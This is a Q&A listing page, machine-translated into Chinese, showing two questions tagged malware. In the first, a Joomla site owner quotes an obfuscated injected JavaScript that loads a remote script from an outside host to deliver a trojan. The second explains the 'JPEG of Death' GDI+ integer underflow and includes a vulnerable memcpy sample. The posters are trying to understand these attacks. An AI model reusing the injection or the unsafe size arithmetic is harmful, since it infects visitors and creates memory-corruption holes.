Questions tagged «malware»

8
该站点感染脚本如何工作?
我的Joomla!网站已被多次入侵。有人以某种方式设法将以下垃圾注入了关键的php脚本,但我的意思是不谈论配置Joomla。该站点的访问量很少(有时我担心我可能是该站点的唯一访问者...),而且我不太在乎如何备份和运行该站点。我最终会解决的。 我的问题是,这种垃圾如何起作用?我看了一下,只是看不出这怎么造成任何伤害?它的作用是尝试下载一个名为ChangeLog.pdf的PDF文件,该文件感染了特洛伊木马,打开后将冻结Acrobat,并在计算机上造成严重破坏。它是如何做到的,我不知道,我不在乎。但是下面的脚本如何调用下载? <script>/*Exception*/ document.write('<script src='+'h#^(t@)((t$&@p#:)&/!$/)@d$y#^#$n@$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^@g))!a#m#@$e&$s^@@!t@@($!o@$p(.&@c&)@(o$m)).!$m$)y@(b@e()s&$t$@y&o$&(u#)$x&&^(i)-@^c!!&n$#.(@g)$e#(^n&!u(i&#&n(e&(!h&o@&^&l^$(l)&y$(#@w!o@!((o#d&^.^#)r$#^u!!$:(#@&8#)(0$8@&0^(/))s#o#^&#^f!$t$!o##n(&$i(^!c$(.!&c@o!&^m#&/&(s&$(o!f&!t@&o!!n)&i$&c!.#^^c)!$o@@((m@#/$^!g#^o$^&o&#g!l)@@@!e&.))c!)(o#@#^!m(&/^^l#^@i##(v&@e&)!$j^!a@$s#m!i)n$.!$c&$o)@$m^/@$v&i^d^()e(!o&&s@(z(@)^.@)c$&o^m)$)^/#$'.replace(/#|\$|@|\^|&|\(|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script> <!--6f471c20c9b96fed179c85ffdd3365cf--> ESET已将此代码检测为JS / TrojanDownloader.Agent.NRO木马

2
JPEG的Death漏洞如何运作?
我一直在阅读有关Windows XP和Windows Server 2003上针对GDI +的较旧漏洞利用的信息,称其为我正在从事的项目的JPEG死亡。 该漏洞在以下链接中有很好的解释:http : //www.infosecwriters.com/text_resources/pdf/JPEG.pdf 基本上,JPEG文件包含一个称为COM的节,其中包含一个(可能为空)注释字段,以及一个两个字节的值,其中包含COM的大小。如果没有注释,则大小为2。读取器(GDI +)读取大小,将其减去2,然后分配适当大小的缓冲区以将注释复制到堆中。攻击涉及0在字段中放置值。GDI +减去2,导致一个值-2 (0xFFFe),其被转化成无符号整数0XFFFFFFFE的memcpy。 样例代码: unsigned int size; size = len - 2; char *comment = (char *)malloc(size + 1); memcpy(comment, src, size); 观察到malloc(0)第三行应该返回一个指向堆上未分配内存的指针。如何写入0XFFFFFFFE字节(4GB!!!!)可能不会使程序崩溃?这是否会超出堆区域并写入其他程序和OS的空间?那会发生什么呢? 据我了解memcpy,它只是将n字符从目标复制到源。在这种情况下,源应该在堆栈上,目标应该在堆上,并且n是4GB。
94 c++  security  memcpy  malware 
By using our site, you acknowledge that you have read and understand our Cookie Policy and Privacy Policy.
Licensed under cc by-sa 3.0 with attribution required.